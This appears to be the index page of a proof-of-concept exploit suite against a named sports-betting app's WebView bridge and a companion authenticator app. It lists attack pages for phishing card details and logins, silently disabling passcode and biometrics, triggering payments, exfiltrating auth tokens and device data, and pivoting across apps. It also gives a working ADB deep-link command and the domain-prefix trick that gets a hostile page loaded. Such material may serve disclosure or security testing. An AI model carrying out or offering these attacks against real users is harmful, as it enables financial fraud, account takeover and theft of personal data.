Exploit PoC Suite

Sports App & Authenticator — WebView Intent Exploit

JS Bridge Test

CRITICAL JS Bridge Interactive Test Suite

Full interactive page with buttons for every confirmed bridge method. Betslip manipulation, gaming commands, members commands, Google Pay, clipboard hijack.

CRITICAL Auto-Exploit Payload

Automated probe — detects bridge, enumerates methods, adds bet, exfiltrates data. Runs on page load.

Phishing Demos

CRITICAL Passcode & Biometrics Removal

Silently disables passcode and biometrics on page load via gaming bridge. Shows fake "verify account" phishing UI.

HIGH Credit Card Phishing

Fake "Deposit £5 get £20" promo with credit card form. Captures card details. Countdown timer for urgency.

HIGH Login Credential Phishing

Fake login page inside the bet365 app frame. Captures username and password.

HIGH Google Pay Trigger

Triggers Google Pay payment flow via members bridge.

Data Scraping

DEMO Live Odds Scraper

Subscribes to live odds feeds via pull_subscribe bridge. Exfiltrates data via callback injection.

Cross-App Exploits

CRITICAL Intent Launch (Cross-App Pivot)

Launches arbitrary intents from WebviewCard. Pivots to Authenticator and other apps on the device.

CRITICAL Authenticator Exploit

Targets Authenticator app via deep link domain injection. Exfiltrates geolocation, device ID, auth tokens.

How to load in bet365 WebView:

Via ExploitApp button, or ADB:

adb shell am start -n com.bet365Wrapper.Bet365_Application/com.bet365.sportsbook.EmptyDeepLinkActivity -a android.intent.action.VIEW -d "https://DOMAIN/PAGE.html?code=x"

Domain must start with casino, games, or slots after removing https://.

For local testing: https://casino.127.0.0.1.nip.io:8443/PAGE.html?code=x